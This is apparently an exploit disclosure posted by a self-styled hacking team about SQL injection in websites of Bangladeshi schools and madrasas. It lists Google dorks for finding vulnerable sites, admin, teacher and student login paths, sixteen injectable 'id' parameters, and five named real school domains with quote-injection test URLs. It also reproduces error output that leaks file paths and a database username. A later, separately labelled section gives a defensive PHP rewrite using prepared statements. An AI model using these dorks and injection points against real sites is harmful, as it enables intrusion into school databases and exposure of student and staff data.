KingSkrupellos

Soft IT Security Hululu IT Bangladesh SQL Injection

Jan 7th, 2019
###############################################################

# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd
#                intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
# CXSecurity Exploit Reference Link : cxsecurity.com/issue/WLB-2019010043

###############################################################

Admin/Teacher/Student Panel Login Path =>

/adminoperation/
/teacheroperation/
/studentoperation/

# SQL Injection Exploits :
**********************

/?v=home.jsp&id=[SQL Injection]

/?v=administrationdeatils.jsp&id=[SQL Injection]

/?v=allteacher.jsp&id=[SQL Injection]

/?v=allclark.jsp&id=[SQL Injection]

/?v=talentstudent-detail.jsp&id=[SQL Injection]

/?v=allstudent.jsp&id=[SQL Injection]

/?v=boardresultdetails.jsp&id=1%27

/?v=universitydetails.jsp&id=[SQL Injection]

/?v=talentteacher-detail.jsp&id=[SQL Injection]

/?v=academiccalender-details.jsp&id=[SQL Injection]

/?v=allevent.jsp&id=[SQL Injection]

/?v=allresult.jsp&id=[SQL Injection]

/?v=noticebord-detail.jsp&id=[SQL Injection]

/?v=uploadbook-details.jsp&id=[SQL Injection]

/?v=usefulllinkdetails.jsp&id=[SQL Injection]

/?v=checkclass.jsp&id=[SQL Injection]

###############################################################

# Example Vulnerable Sites =>
***************************

Note : (192.185.94.62) => There are 182 domains hosted on this server.

[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27

###############################################################

# SQL Database Error :
*********************

Deprecated: mysql_connect(): The mysql extension is deprecated and
will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali
/public_html/DAL/DbConnect.php on line 8

Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost'
(using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: fread(): Length parameter must be greater than 0 in
/home/haripuralimmadra/public_html/controller/function.php on line 220

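The error dumps above show the application still uses the legacy mysql_*() PHP extension and prints driver errors (file paths, the database username) straight to the client, and the trailing %27 in the id parameter shows the value is spliced into the SQL text. The following is an added example, not the vendor's code: a hypothetical reconstruction of the unsafe id lookup pattern (CWE-89) placed beside a hardened version that follows the deprecation notice's own advice and uses PDO with a bound parameter. The table and column names (school_notice, id, title, body), the database name and the placeholder credentials are all assumptions.

```php
<?php
// Added example, not the vendor's code. The "unsafe" function is a hypothetical
// reconstruction of the CWE-89 pattern; the "safe" one is the fix.
// Assumed: table school_notice(id, title, body), database "school".

declare(strict_types=1);
ini_set('display_errors', '0');   // never show driver errors to the browser

// --- Before: the parameter is spliced into the statement as text. ---
// mysql_query() offers no parameter binding, so ?id=3%27 (a trailing quote)
// becomes part of the SQL and produces a syntax error instead of a 404.
// (Only runs on PHP 5.x; the mysql extension was removed in PHP 7.)
function fetch_notice_unsafe($link, string $id): ?array
{
    // DO NOT USE: this is the vulnerable pattern.
    $sql = "SELECT id, title, body FROM school_notice WHERE id = " . $id;
    $res = mysql_query($sql, $link);
    return $res ? (mysql_fetch_assoc($res) ?: null) : null;
}

// --- After: PDO with a prepared statement, as the deprecation notice suggests. ---
function db(): PDO
{
    // Credentials are placeholders; read real ones from outside the web root.
    $dsn = 'mysql:host=localhost;dbname=school;charset=utf8mb4';
    return new PDO($dsn, 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

function fetch_notice_safe(PDO $pdo, string $rawId): ?array
{
    // 1. Validate the type first: an id is a positive integer, nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                 // "3'" is rejected here before any SQL runs
    }
    // 2. Bind the value; the driver sends it separately from the statement text,
    //    so it can never change the query structure.
    $stmt = $pdo->prepare('SELECT id, title, body FROM school_notice WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

// Usage from the page dispatcher that handles ?v=...&id=... (assumed layout).
try {
    $row = fetch_notice_safe(db(), $_GET['id'] ?? '');
    if ($row === null) {
        http_response_code(404);
        exit('Not found');
    }
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8');
} catch (PDOException $e) {
    // 3. Log the driver error server-side; the client gets a generic page.
    error_log($e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
```

The integer check and the bound parameter are independent layers: even if a future query needs a string value, binding alone keeps the value out of the statement grammar, and turning display_errors off removes the path and username leakage seen in the error dumps above.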
###############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###############################################################